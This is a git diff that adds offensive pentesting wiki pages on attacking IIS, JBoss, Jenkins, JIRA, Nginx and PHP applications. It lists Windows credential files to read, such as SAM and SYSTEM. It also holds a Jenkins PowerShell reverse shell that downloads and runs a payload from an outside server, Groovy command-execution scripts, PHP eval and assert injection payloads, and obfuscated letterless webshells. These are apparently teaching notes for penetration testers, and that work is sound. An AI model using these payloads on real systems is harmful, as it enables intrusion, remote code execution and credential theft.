+C:\Program Files\MySQL\my.ini
+C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
+C:\Program Files\MySQL\MySQL Server 5.0\my.ini
+C:\Program Files\MySQL\MySQL Server 5.1\my.cnf
+C:\Program Files\MySQL\MySQL Server 5.1\my.ini
+C:\Program Files\MySQL\MySQL Server 5.5\my.cnf
+C:\Program Files\MySQL\MySQL Server 5.5\my.ini
+C:\Program Files\MySQL\MySQL Server 5.6\my.cnf
+C:\Program Files\MySQL\MySQL Server 5.6\my.ini
+C:\Program Files\MySQL\MySQL Server 5.7\my.cnf
+C:\Program Files\MySQL\MySQL Server 5.7\my.ini
+C:\Program Files\php\php.ini
+C:\Users\Administrator\NTUser.dat
+C:\Windows\debug\NetSetup.LOG
+C:\Windows\Panther\Unattend\Unattended.xml
+C:\Windows\Panther\Unattended.xml
+C:\Windows\php.ini
+C:\Windows\repair\SAM
+C:\Windows\repair\system
+C:\Windows\System32\config\AppEvent.evt
+C:\Windows\System32\config\RegBack\SAM
+C:\Windows\System32\config\RegBack\system
+C:\Windows\System32\config\SAM
+C:\Windows\System32\config\SecEvent.evt
+C:\Windows\System32\config\SysEvent.evt
+C:\Windows\System32\config\SYSTEM
+C:\Windows\System32\drivers\etc\hosts
+C:\Windows\System32\winevt\Logs\Application.evtx
+C:\Windows\System32\winevt\Logs\Security.evtx
+C:\Windows\System32\winevt\Logs\System.evtx
+C:\Windows\win.ini 
+C:\xampp\apache\conf\extra\httpd-xampp.conf
+C:\xampp\apache\conf\httpd.conf
+C:\xampp\apache\logs\access.log
+C:\xampp\apache\logs\error.log
+C:\xampp\FileZillaFTP\FileZilla Server.xml
+C:\xampp\MercuryMail\MERCURY.INI
+C:\xampp\mysql\bin\my.ini
+C:\xampp\php\php.ini
+C:\xampp\security\webdav.htpasswd
+C:\xampp\sendmail\sendmail.ini
+C:\xampp\tomcat\conf\server.xml
+```
+
+## Old IIS vulnerabilities worth looking for
+
+### Microsoft IIS tilde character “~” Vulnerability/Feature – Short File/Folder Name Disclosure
+
+You can try to **enumerate folders and files** inside every discovered folder \(even if it's requiring Basic Authentication\) using this **technique**.  
+The main limitation of this technique if the server is vulnerable is that **it can only find up to the first 6 letters of the name of each file/folder and the first 3 letters of the extension** of the files.
+
+You can use [https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) to test for this vulnerability:`java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/`
+
+![](../../.gitbook/assets/image%20%28161%29.png)
+
+Original research: [https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf](https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf)
+
+You can also use **metasploit**: `use scanner/http/iis_shortname_scanner`
+
+### Basic Authentication bypass
+
+**Bypass** a Baisc authentication \(**IIS 7.5**\) trying to access: `/admin:$i30:$INDEX_ALLOCATION/admin.php` or `/admin::$INDEX_ALLOCATION/admin.php`
+
+You can try to **mix** this **vulnerability** and the last one to find new **folders** and **bypass** the authentication.
+
diff --git a/pentesting/pentesting-web/jboss.md b/pentesting/pentesting-web/jboss.md
new file mode 100644
index 00000000..e0479e6d
--- /dev/null
+++ b/pentesting/pentesting-web/jboss.md
@@ -0,0 +1,24 @@
+# JBOSS
+
+## Enumeration
+
+The _/web-console/ServerInfo.jsp_ and _/status?full=true_ web pages often reveal **server details**.
+
+You can expose **management servlets** via the following paths within JBoss \(depending on the version\): _/admin-console_, _/jmx-console_, _/management_, and _/web-console_. Default credentials are **admin**/**admin**. Upon gaining access, you can use available invoker servlets to interact with exposed MBeans:
+
+* /web-console/Invoker \(JBoss versions 6 and 7\)
+* /invoker/JMXInvokerServlet and /invoker/EJBInvokerServlet \(JBoss 5 and prior\)
+
+**You can enumerate and even exploit a JBOSS service using** [**clusterd**](https://github.com/hatRiot/clusterd)  
+**Or using metasploit:** 
`msf > use auxiliary/scanner/http/jboss_vulnscan`
+
+### Exploitation
+
+[https://github.com/joaomatosf/jexboss](https://github.com/joaomatosf/jexboss)
+
+### Google Dork
+
+```text
+inurl:status EJInvokerServlet
+```
+
diff --git a/pentesting/pentesting-web/jenkins.md b/pentesting/pentesting-web/jenkins.md
new file mode 100644
index 00000000..574ebf4d
--- /dev/null
+++ b/pentesting/pentesting-web/jenkins.md
@@ -0,0 +1,119 @@
+# Jenkins
+
+## Enumeration
+
+In order to search for interesting Jenkins pages without authentication like \(_/people_ or _/asynchPeople_, this lists the current users\) you can use:
+
+```text
+msf> use auxiliary/scanner/http/jenkins_enum
+```
+
+Check if you can execute commands without needing authentication:
+
+```text
+msf> use auxiliary/scanner/http/jenkins_command
+```
+
+Without credentials you can look inside _**/asynchPeople/**_ path for **usernames**.
+
+## Bruteforce
+
+**Jekins** does **not** implement any **password policy** or username **brute-force mitigation**. Then, you **should** always try to **brute-force** users because probably **weak passwords** are being used \(even **usernames as passwords** or **reverse** usernames as passwords\).
+
+```text
+msf> use auxiliary/scanner/http/jenkins_login
+```
+
+## Exploiting Vulnerabilities
+
+{% embed url="https://github.com/gquere/pwn\_jenkins" %}
+
+
+
+## Code Execution
+
+There are 3 ways to get **code execution** with Jenkins.
+
+### **Create a new project**
+
+This method is very noisy because you have to create a hole new project \(obviously this will only work if you user is allowed to create a new project\).
+
+1. Create a new project \(Freestyle project\)
+2. Inside **Build** section set **Execute shell** and paste a powershell Empire launcher or a meterpreter powershell \(can be obtained using _unicorn_\). Start the payload with _PowerShell.exe_ instead using _powershell._
+3. Click **Build now**
+
+\*\*\*\*
+
+Go to the projects and check **if you can configure any** of them \(look for the "Configure button"\):
+
+![](../../.gitbook/assets/image%20%28228%29.png)
+
+Or **try to access to the path** _**/configure**_ in each project \(example: /_me/my-views/view/all/job/Project0/configure_\).
+
+If you are allowed to configure the project you can **make it execute commands when a build is successful**:
+
+![](../../.gitbook/assets/image%20%2887%29.png)
+
+Click on **Save** and **build** the project and your **command will be executed**.  
+If you are not executing a reverse shell but a simple command you can **see the output of the command inside the output of the build**.
+
+### **Execute Groovy script**
+
+Best way. Less noisy.
+
+1. Go to _path\_jenkins/script_
+2. Inside the text box introduce the script
+
+```python
+def process = "PowerShell.exe <WHATEVER>".execute()
+println "Found text ${process.text}"
+```
+
+You could execute a command using: `cmd.exe /c dir`
+
+In **linux** you can do:  **`"ls /".execute().text`**
+
+If you need to use _quotes_ and _single quotes_ inside the text. You can use _"""PAYLOAD"""_ \(triple double quotes\) to execute the payload.
+
+**Another useful groovy script** is \(replace \[INSERT COMMAND\]\):
+
+```python
+def sout = new StringBuffer(), serr = new StringBuffer()
+def proc = '[INSERT COMMAND]'.execute()
+proc.consumeProcessOutput(sout, serr)
+proc.waitForOrKill(1000)
+println "out> $sout err> $serr"
+```
+
+### Reverse shell in windows
+
+You can prepare a HTTP server with a PS reverse shell and use Jeking to download and execute it:
+
+```python
+scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')"
+echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
+cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc <BASE64>
+```
+
+### MSF exploit
+
+You can use MSF to get a reverse shell:
+
+```text
+msf> use exploit/multi/http/jenkins_script_console
+```
+
+## POST
+
+Dump Jenkins credentials using:
+
+```text
+msf> post/multi/gather/jenkins_gather
+```
+
+## References
+
+{% embed url="https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/" %}
+
+{% embed url="https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password" %}
+
diff --git a/pentesting/pentesting-web/jira.md b/pentesting/pentesting-web/jira.md
new file mode 100644
index 00000000..e5fba1ab
--- /dev/null
+++ b/pentesting/pentesting-web/jira.md
@@ -0,0 +1,17 @@
+# JIRA
+
+### Check Privileges
+
+Inside a Jira instance **any user** \(even **non-authenticated**\) can **check its privileges** in `/rest/api/2/mypermissions` or `/rest/api/3/mypermissions` . These endpoints will return your current privileges.  
+If a **non-authenticated** user have any **privilege**, this is a **vulnerability** \(bounty?\).  
+If an **authenticated** user have any **unexpected privilege**, this a a **vuln**.
+
+```bash
+#Check non-authenticated privileges
+curl https://jira.some.example.com/rest/api/2/mypermissions | jq | grep -iB6 '"havePermission": true'
+```
+
+### Check Exploits
+
+Check and exploit JIRA vulnerabilities with [https://github.com/0x48piraj/Jiraffe](https://github.com/0x48piraj/Jiraffe)
+
diff --git a/pentesting/pentesting-web/joomla.md b/pentesting/pentesting-web/joomla.md
new file mode 100644
index 00000000..6b8d6b61
--- /dev/null
+++ b/pentesting/pentesting-web/joomla.md
@@ -0,0 +1,7 @@
+# Joomla
+
+In _**/administrator/manifests/files/joomla.xml**_ you could access a list of files inside the root folder, and version of Joomla.  
+From _**/plugins/system/cache/cache.xml**_ you could get an approximate version of Joomla thanks to the copyright information.
+
+In[ **80,443 - Pentesting Web Methodology is a section about CMS scanners**](./#cms-scanners) that can scan Joomla.
+
diff --git a/pentesting/pentesting-web/jsp.md b/pentesting/pentesting-web/jsp.md
new file mode 100644
index 00000000..15097d54
--- /dev/null
+++ b/pentesting/pentesting-web/jsp.md
@@ -0,0 +1,17 @@
+# JSP
+
+##  **getContextPath** abuse
+
+Info from [here](https://blog.rakeshmane.com/2020/04/jsp-contextpath-link-manipulation-xss.html).
+
+```text
+ http://127.0.0.1:8080/&sol;rakeshmane.com/xss.js&num;/..;/..;/contextPathExample/test.jsp
+```
+
+Accessing that web you may change all the links to request the information to _**rakeshmane.com**_:
+
+![](../../.gitbook/assets/image%20%2854%29.png)
+
+  
+
+
diff --git a/pentesting/pentesting-web/nginx.md b/pentesting/pentesting-web/nginx.md
new file mode 100644
index 00000000..0bebe8f9
--- /dev/null
+++ b/pentesting/pentesting-web/nginx.md
@@ -0,0 +1,52 @@
+# Nginx
+
+## Alias LFI Misconfiguration
+
+Inside the Nginx configuration look the "location" statements, if someone looks like:
+
+```text
+location /imgs { 
+    alias /path/images/ 
+}
+```
+
+There is a LFI vulnerability because:
+
+```text
+/imgs../flag.txt
+```
+
+Transforms to:
+
+```text
+/path/images/../flag.txt
+```
+
+The correct configuration will be:
+
+```text
+location /imgs/ { 
+    alias /path/images/ 
+}
+```
+
+**So, if you find some Nginx server you should check for this vulnerability. Also, you can discover it if you find that the files/directories brute force is behaving weird.**
+
+More info: [https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/](https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/)
+
+Accunetix tests:
+
+```text
+alias../ => HTTP status code 403
+alias.../ => HTTP status code 404
+alias../../ => HTTP status code 403
+alias../../../../../../../../../../../ => HTTP status code 400
+alias../ => HTTP status code 403
+```
+
+## Static Analyzer tools
+
+### [GIXY](https://github.com/yandex/gixy)
+
+Gixy is a tool to analyze Nginx configuration. The main goal of Gixy is to prevent security misconfiguration and automate flaw detection.
+
diff --git a/pentesting/pentesting-web/php-tricks-esp/README.md b/pentesting/pentesting-web/php-tricks-esp/README.md
new file mode 100644
index 00000000..3d4872d3
--- /dev/null
+++ b/pentesting/pentesting-web/php-tricks-esp/README.md
@@ -0,0 +1,303 @@
+# PHP Tricks \(SPA\)
+
+## Cookies common location:
+
+This is also valid for phpMyAdmin cookies.
+
+Cookies:
+
+```text
+PHPSESSID
+phpMyAdmin
+```
+
+Locations:
+
+```text
+/var/lib/php/sessions
+```
+
+## Bypassing PHP comparisons
+
+### Loose comparisons/Type Juggling \( == \)
+
+PHP comparison tables: [https://www.php.net/manual/en/types.comparisons.php](https://www.php.net/manual/en/types.comparisons.php)
+
+![](../../../.gitbook/assets/image%20%28123%29.png)
+
+{% file src="../../../.gitbook/assets/en-php-loose-comparison-type-juggling-owasp \(1\).pdf" %}
+
+* `"string" == 0 -> True` ****A string which doesn't start with a number is equals to a number
+* `"0xAAAA" == "43690" -> True` Strings composed by numbers in dec or hex format can be compare to other numbers/strings with True as result if the numbers were the same \(numbers in a string are interpreted as numbers\)
+* `"0e3264578" == 0 --> True` A string starting with "0e" and followed by anything will be equals to 0
+* `"0X3264578" == 0X --> True` A string starting with "0" and followed by any letter \(X can be any letter\) and followed by anything will be equals to 0
+* `"0e12334" == "0" --> True` This is very interesting because in some cases yo can control the string input of "0" and some content that is being hashed and compared to it. Therefore, if you can provide a value that will create a hash starting with "0e" and without any letter, you could bypass the comparison. You can find **already hashed strings** with this format here: [https://github.com/spaze/hashes](https://github.com/spaze/hashes)
+* `"X" == 0 --> True` Any letter in a string is equals to int 0
+
+Con estas igualdades se pueden bypasear comparaciones de PHP \(teniendo en cuenta que todo lo que se manda por parámetros normales de formulario siempre son strings\).  
+Sobre todo usando el truco de String que empieza por "0e" siempre es igual a "0", así si hay que pasar un hmac y podemos alterar valores, podemos enviar como hmac simplemente "0" y si el hmac sale que vale "0eXXXXXXXXXXX" pues dará correcto y se lo tragará  
+Se puede intentar enviar los datos encodeados como json a ver si los lee \(hay que cambiar la cabecera de tipo de datos para decir que es json y rezar para que se lo coma\) \(en json se elige el tipo de datos\)
+
+[https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09](https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09)
+
+### **in\_array\(\)**
+
+**Type Juggling** also affects to the `in_array()` function by default \(you need to set to true the third argument to make an strict comparison\):
+
+```php
+$values = array("apple","orange","pear","grape");
+var_dump(in_array(0, $values));
+//True
+var_dump(in_array(0, $values, true));
+//False
+```
+
+### **strcmp\(\)/**strcasecmp\(\)
+
+If this function is used for **any authentication check** \(like checking the password\) and the user controls one side of the comparison, he can send an empty array instead of a string as the value of the password \(`https://example.com/login.php/?username=admin&password[]=`\) and bypass this check:
+
+```php
+if (!strcmp("real_pwd","real_pwd")) { echo "Real Password"; } else { echo "No Real Password"; }
+// Real Password
+if (!strcmp(array(),"real_pwd")) { echo "Real Password"; } else { echo "No Real Password"; }
+// Real Password
+```
+
+The same error occurs with `strcasecmp()`
+
+### Strict type Juggling
+
+Even if `===` is **being used** there could be errors that makes the **comparison vulnerable** to **type juggling**. For example, if the comparison is **converting the data to a different type of object before comparing**:
+
+```php
+(int) "1abc" === (int) "1xyz" //This will be true
+```
+
+### preg\_match\(/^.\*/\)
+
+**`preg_match()`** could be used to **validate user input** \(it **checks** if any **word/regex** from a **blacklist** is **present** on the **user input** and if it's not, the code can continue it's execution\).
+
+#### New line bypass
+
+However, when delimiting the start of the regexp`preg_match()` **only checks the first line of the user input**, then if somehow you can **send** the input in **several lines**, you could be able to bypass this check. Example:
+
+```php
+$myinput="aaaaaaa
+11111111"; //Notice the new line
+echo preg_match("/1/",$myinput);
+//1  --> In this scenario preg_match find the char "1"
+echo preg_match("/1.*$/",$myinput);
+//1  --> In this scenario preg_match find the char "1"
+echo preg_match("/^.*1/",$myinput);
+//0  --> In this scenario preg_match DOESN'T find the char "1"
+echo preg_match("/^.*1.*$/",$myinput);
+//0  --> In this scenario preg_match DOESN'T find the char "1"
+```
+
+To bypass this check you could **send the value with new-lines urlencoded** \(`%0A`\) or if you can send **JSON data**, send it in **several lines**:
+
+```php
+{
+  "cmd": "cat /etc/passwd"
+}
+```
+
+Find an example here: [https://ramadistra.dev/fbctf-2019-rceservice](https://ramadistra.dev/fbctf-2019-rceservice)
+
+#### **Length error bypass**
+
+\(This bypass was tried apparently on PHP 5.2.5 and I couldn't make it work on PHP 7.3.15\)  
+If you can send to `preg_match()` a valid very **large input**, it **won't be able to process it** and you will be able to **bypass** the check. For example, if it is blacklisting a JSON you could send:
+
+```text
+payload = '{"cmd": "ls -la", "injected": "'+ "a"*1000000 + '"}'
+```
+
+From: [https://medium.com/bugbountywriteup/solving-each-and-every-fb-ctf-challenge-part-1-4bce03e2ecb0](https://medium.com/bugbountywriteup/solving-each-and-every-fb-ctf-challenge-part-1-4bce03e2ecb0)
+
+## More tricks
+
+**register\_globals**: En PHP &lt; 4.1.1 o si se ha configurado mal puede ser que las register\_globals estén activas \(o se esté imitando su comportamiento\). Esto implica que en variables globales como $\_GET si estas poseen un valor por ejemplo $\_GET\["param"\]="1234", puedes acceder a este mediante $param. Por lo tanto, enviando parámetros de Get o Post se pueden sobreescribir variables que se usan dentro del código.
+
+Las **variables de sesión** \(asociadas al **PHPSESSION**\) de un dominio se guardan en el mismo sitio, por lo tanto si dentro de un dominio se usan distintas cookies en distintos paths se puede hacer que un path acceda a la cookie del otro accediendo a dicho path con la cookie del otro. De esta forma si los dos paths acceden a una variable con el mismo nombre puedes hacer que el valor de dicha variable en el path1 se aplique al path2. Y entonces el path2 tomará como válidas las variables del path1 \(al ponerle a la cookie el nombre que le corresponde en el path2\).
+
+Dos usuarios generados a la vez pueden tener la misma cookie \(si la cookie depende del tiempo\).
+
+When you have the **usernames** of teh users of the machine. Check the address: **/~&lt;USERNAME&gt;** to see if the php directories are activated.
+
+\*\*\*\*[**LFI and RCE using php wrappers**](../../../pentesting-web/file-inclusion.md)\*\*\*\*
+
+## Code execution
+
+**system\("ls"\);  
+\`ls\`;  
+shell\_exec\("ls"\);**
+
+[Check this for more useful PHP functions](php-useful-functions.md)
+
+### **Code execution using** **preg\_replace\(\)**
+
+```php
+preg_replace(pattern,replace,base)
+preg_replace("/a/e","phpinfo()","whatever")
+```
+
+To execute the code in the "replace" argument is needed at least one match.  
+This option of preg\_replace has been **deprecated as of PHP 5.5.0.**
+
+### **Code execution with Eval\(\)**
+
+```text
+'.system('uname -a'); $dummy='
+'.system('uname -a');#
+'.system('uname -a');//
+'.phpinfo().'
+<?php phpinfo(); ?>
+```
+
+### **Code execution with Assert\(\)**
+
+Esta función dentro de php permite ejecutar código que está escrito en un string con el objetivo de que se devuelva true o false \(y dependiendo de esto alterar la ejecución\). Por lo general se introducirá la variable del usuario entre medias de un string. Por ejemplo: assert\("strpos\($\_GET\['page'\]\),'..'\) === false"\) --&gt; En este caso el payload para ejecutar un comando podría ser:
+
+```text
+?page=a','NeVeR') === false and system('ls') and strpos('a
+```
+
+El caso es que hay que romper la query, ejecutar algo y volver a arreglarla \(para ello nos servimos del "and" o "%26%26" o "\|" --&gt; el "or", "\|\|" no funcionan pues si la primera es cierta deja de ejecutar y el ";" no funciona pues solo ejecuta la primera parte\).
+
+**Other option** is to add to the string the execution of the command:  _'.highlight\_file\('.passwd'\).'_
+
+**Other option** \(if you have the internal code\) is to modify some variable to alter the execution: _$file = "hola"_
+
+### **Code execution with usort\(\)**
+
+This function is used to sort an array of items using an specific function.  
+To abuse this function:
+
+```php
+<?php usort(VALUE, "cmp"); #Being cmp a valid function ?>
+VALUE: );phpinfo();#
+
+<?php usort();phpinfo();#, "cmp"); #Being cmp a valid function ?>
+```
+
+```php
+<?php
+function foo($x,$y){
+    usort(VALUE, "cmp");
+}?>
+VALUE: );}[PHP CODE];#
+
+<?php
+function foo($x,$y){
+    usort();}phpinfo;#, "cmp");
+}?>
+```
+
+You can also use **//** to comment the rest of the code.
+
+To discover the number of parenthesis that you need to close:
+
+* `?order=id;}//`: we get an error message \(`Parse error: syntax error, unexpected ';'`\). We are probably missing one or more brackets.
+* `?order=id);}//`: we get a **warning**. That seems about right.
+* `?order=id));}//`: we get an error message \(`Parse error: syntax error, unexpected ')' i`\). We probably have too many closing brackets.
+
+### **Code execution via .httaccess**
+
+If you can **upload** a **.htaccess**, then you can **configure** several things and even execute code \(configuring that files with extension .htaccess can be **executed**\).
+
+Different .htaccess shells can be found [here](https://github.com/wireghoul/htshells)
+
+## PHP Static analysis
+
+Look if you can insert code in calls to these functions \(from [here](https://www.youtube.com/watch?v=SyWUsN0yHKI&feature=youtu.be)\):
+
+```php
+exec, shell_exec, system, passthru, eval, popen
+unserialize, include, file_put_cotents
+$_COOKIE | if #This mea
+```
+
+If yo are debugging a PHP application you can globally enable error printing in`/etc/php5/apache2/php.ini` adding `display_errors = On` and restart apache : `sudo systemctl restart apache2`
+
+## Execute PHP without letters
+
+[https://securityonline.info/bypass-waf-php-webshell-without-numbers-letters/](https://securityonline.info/bypass-waf-php-webshell-without-numbers-letters/)
+
+### Using octal
+
+```php
+$_="\163\171\163\164\145\155(\143\141\164\40\56\160\141\163\163\167\144)"; #system(cat .passwd);
+```
+
+### **XOR**
+
+```php
+$_=("%28"^"[").("%33"^"[").("%34"^"[").("%2c"^"[").("%04"^"[").("%28"^"[").("%34"^"[").("%2e"^"[").("%29"^"[").("%38"^"[").("%3e"^"["); #show_source
+$__=("%0f"^"!").("%2f"^"_").("%3e"^"_").("%2c"^"_").("%2c"^"_").("%28"^"_").("%3b"^"_"); #.passwd
+$___=$__; #Could be not needed inside eval
+$_($___); #If ¢___ not needed then $_($__), show_source(.passwd)
+```
+
+### XOR Shellcode \(inside eval\)
+
+```bash
+#!/bin/bash
+
+if [[ -z $1 ]]; then
+  echo "USAGE: $0 CMD"
+  exit
+fi
+
+CMD=$1
+CODE="\$_='\
+```
+
+```php
+lt;>/'^'{{{{';\${\$_}[_](\${\$_}[__]);" `$_='
+```
+
+```php
+lt;>/'^'{{{{'; --> _GET` `${$_}[_](${$_}[__]); --> $_GET[_]($_GET[__])` `So, the function is inside $_GET[_] and the parameter is inside $_GET[__]` http --form POST "http://victim.com/index.php?_=system&__=$CMD" "input=$CODE"
+```
+
+### Perl like
+
+```php
+<?php
+$_=[];
+$_=@"$_"; // $_='Array';
+$_=$_['!'=='@']; // $_=$_[0];
+$___=$_; // A
+$__=$_;
+$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
+$___.=$__; // S
+$___.=$__; // S
+$__=$_;
+$__++;$__++;$__++;$__++; // E 
+$___.=$__;
+$__=$_;
+$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
+$___.=$__;
+$__=$_;
+$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
+$___.=$__;
+ 
+$____='_';
+$__=$_;
+$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
+$____.=$__;
+$__=$_;
+$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
+$____.=$__;
+$__=$_;
+$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
+$____.=$__;
+$__=$_;
+$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
+$____.=$__;
+ 
+$_=$$____;
+$___($_[_]); // ASSERT($_POST[_]);
+```
+
diff --git a/pentesting/pentesting-web/php-tricks-esp/php-useful-functions.md b/pentesting/pentesting-web/php-tricks-esp/php-useful-functions.md
new file mode 100644
index 00000000..0bcfe6c9
--- /dev/null
+++ b/pentesting/pentesting-web/php-tricks-esp/php-useful-functions.md
@@ -0,0 +1,218 @@
+# PHP - Useful Functions \(disabled bypass\)
+
+## PHP check disabled functions
+
+If you can see the output of _**phpinfo\(\)**_, look for the section about **disable\_functions.** There you will find the list of disabled functions.
+
+![](https://0xrick.github.io/images/hackthebox/kryptos/17.png)
+
+### Bypassing
+
+A way to **bypass the common disabled functions** is using [https://github.com/TarlogicSecurity/Chankro](https://github.com/TarlogicSecurity/Chankro)  
+that bypass them using the php functionns _**mail\(\)**_ and _**putenv\(\)**._
+
+## PHPCommand Execution
+
+**exec** - Returns last line of commands output  
+**passthru** - Passes commands output directly to the browser  
+**system** - Passes commands output directly to the browser and returns last line  
+**shell\_exec** - Returns commands output  
+**\`\`** \(backticks\) - Same as shell\_exec\(\)  
+**popen** - Opens read or write pipe to process of a command  
+**proc\_open** - Similar to popen\(\) but greater degree of control  
+**pcntl\_exec** - Executes a program
+
+### PHP Code Execution
+
+Apart from eval there are other ways to execute PHP code: include/require can be used for remote code execution in the form of Local File Include and Remote File Include vulnerabilities.  
+**eval\(\)**  
+assert\(\) - identical to eval\(\)  
+**preg\_replace\('/.\*/e',...\)** - /e does an eval\(\) on the match  
+**create\_function\(\)** - Create a function and use eval\(\)  
+**include\(\)**  
+**include\_once\(\)**  
+**require\(\)**  
+**require\_once\(\)**  
+**$\_GET\['func\_name'\]\($\_GET\['argument'\]\);**  
+**$func = new ReflectionFunction\($\_GET\['func\_name'\]\);  
+$func-&gt;invoke\(\);**  or  
+**$func-&gt;invokeArgs\(array\(\)\);  
+serialize/unserialize**
+
+### List of functions which accept callbacks
+
+These functions accept a string parameter which could be used to call a function of the attacker's choice. Depending on the function the attacker may or may not have the ability to pass a parameter. In that case an Information Disclosure function like phpinfo\(\) could be used.  
+Function =&gt; Position of callback arguments  
+'ob\_start' =&gt; 0,  
+'array\_diff\_uassoc' =&gt; -1,  
+'array\_diff\_ukey' =&gt; -1,  
+'array\_filter' =&gt; 1,  
+'array\_intersect\_uassoc' =&gt; -1,  
+'array\_intersect\_ukey' =&gt; -1,  
+'array\_map' =&gt; 0,  
+'array\_reduce' =&gt; 1,  
+'array\_udiff\_assoc' =&gt; -1,  
+'array\_udiff\_uassoc' =&gt; array\(-1, -2\),  
+'array\_udiff' =&gt; -1,  
+'array\_uintersect\_assoc' =&gt; -1,  
+'array\_uintersect\_uassoc' =&gt; array\(-1, -2\),  
+'array\_uintersect' =&gt; -1,  
+'array\_walk\_recursive' =&gt; 1,  
+'array\_walk' =&gt; 1,  
+'assert\_options' =&gt; 1,  
+'uasort' =&gt; 1,  
+'uksort' =&gt; 1,  
+'usort' =&gt; 1,  
+'preg\_replace\_callback' =&gt; 1,  
+'spl\_autoload\_register' =&gt; 0,  
+'iterator\_apply' =&gt; 1,  
+'call\_user\_func' =&gt; 0,  
+'call\_user\_func\_array' =&gt; 0,  
+'register\_shutdown\_function' =&gt; 0,  
+'register\_tick\_function' =&gt; 0,  
+'set\_error\_handler' =&gt; 0,  
+'set\_exception\_handler' =&gt; 0,  
+'session\_set\_save\_handler' =&gt; array\(0, 1, 2, 3, 4, 5\),  
+'sqlite\_create\_aggregate' =&gt; array\(2, 3\),  
+'sqlite\_create\_function' =&gt; 2,
+
+### Information Disclosure
+
+Most of these function calls are not sinks. But rather it maybe a vulnerability if any of the data returned is viewable to an attacker. If an attacker can see phpinfo\(\) it is definitely a vulnerability.  
+**phpinfo**  
+**posix\_mkfifo**  
+**posix\_getlogin**  
+**posix\_ttyname**  
+**getenv**  
+**get\_current\_user**  
+**proc\_get\_status**  
+**get\_cfg\_var**  
+**disk\_free\_space**  
+**disk\_total\_space**  
+**diskfreespace**  
+**getcwd**  
+**getlastmo**  
+**getmygid**  
+**getmyinode**  
+**getmypid**  
+**getmyuid**
+
+### Other
+
+**extract** - Opens the door for register\_globals attacks \(see study in scarlet\).  
+**parse\_str** - works like extract if only one argument is given.  
+putenv  
+**ini\_set**  
+**mail** - has CRLF injection in the 3rd parameter, opens the door for spam.  
+**header** - on old systems CRLF injection could be used for xss or other purposes, now it is still a problem if they do a header\("location: ..."\); and they do not die\(\);. The script keeps executing after a call to header\(\), and will still print output normally. This is nasty if you are trying to protect an administrative area.  
+**proc\_nice**  
+**proc\_terminate**  
+**proc\_close**  
+**pfsockopen**  
+**fsockopen**  
+**apache\_child\_terminate**  
+**posix\_kill**  
+**posix\_mkfifo**  
+**posix\_setpgid**  
+**posix\_setsid**  
+**posix\_setuid**
+
+### Filesystem Functions
+
+According to RATS all filesystem functions in php are nasty. Some of these don't seem very useful to the attacker. Others are more useful than you might think. For instance if allow\_url\_fopen=On then a url can be used as a file path, so a call to copy\($\_GET\['s'\], $\_GET\['d'\]\); can be used to upload a PHP script anywhere on the system. Also if a site is vulnerable to a request send via GET everyone of those file system functions can be abused to channel and attack to another host through your server.
+
+**Open filesystem handler**
+
+**fopen**  
+**tmpfile**  
+**bzopen**  
+**gzopen**  
+**SplFileObject**-&gt;\_\_construct
+
+**Write to filesystem \(partially in combination with reading\)**
+
+**chgrp**  
+**chmod**  
+**chown**  
+**copy**  
+**file\_put\_contents**  
+**lchgrp**  
+**lchown**  
+**link**  
+**mkdir**  
+**move\_uploaded\_file**  
+**rename**  
+**rmdir**  
+**symlink**  
+**tempnam**  
+**touch**  
+**unlink**  
+**imagepng**  - 2nd parameter is a path.  
+**imagewbmp** - 2nd parameter is a path.  
+**image2wbmp** - 2nd parameter is a path.  
+**imagejpeg** - 2nd parameter is a path.  
+**imagexbm** - 2nd parameter is a path.  
+**imagegif** - 2nd parameter is a path.  
+**imagegd** - 2nd parameter is a path.  
+**imagegd2** - 2nd parameter is a path.  
+**iptcembed**  
+**ftp\_get**  
+**ftp\_nb\_get**  
+**scandir**
+
+**Read from filesystem**
+
+**file\_exists**  
+**-- file\_get\_contents**  
+**file**  
+**fileatime**  
+**filectime**  
+**filegroup**  
+**fileinode**  
+**filemtime**  
+**fileowner**  
+**fileperms**  
+**filesize**  
+**filetype**  
+**glob**  
+**is\_dir**  
+**is\_executable**  
+**is\_file**  
+**is\_link**  
+**is\_readable**  
+**is\_uploaded\_file**  
+**is\_writable**  
+**is\_writeable**  
+**linkinfo**  
+**lstat**  
+**parse\_ini\_file**  
+**pathinfo**  
+**readfile**  
+**readlink**  
+**realpath**  
+**stat**  
+**gzfile**  
+**readgzfile**  
+**getimagesize**  
+**imagecreatefromgif**  
+**imagecreatefromjpeg**  
+**imagecreatefrompng**  
+**imagecreatefromwbmp**  
+**imagecreatefromxbm**  
+**imagecreatefromxpm**  
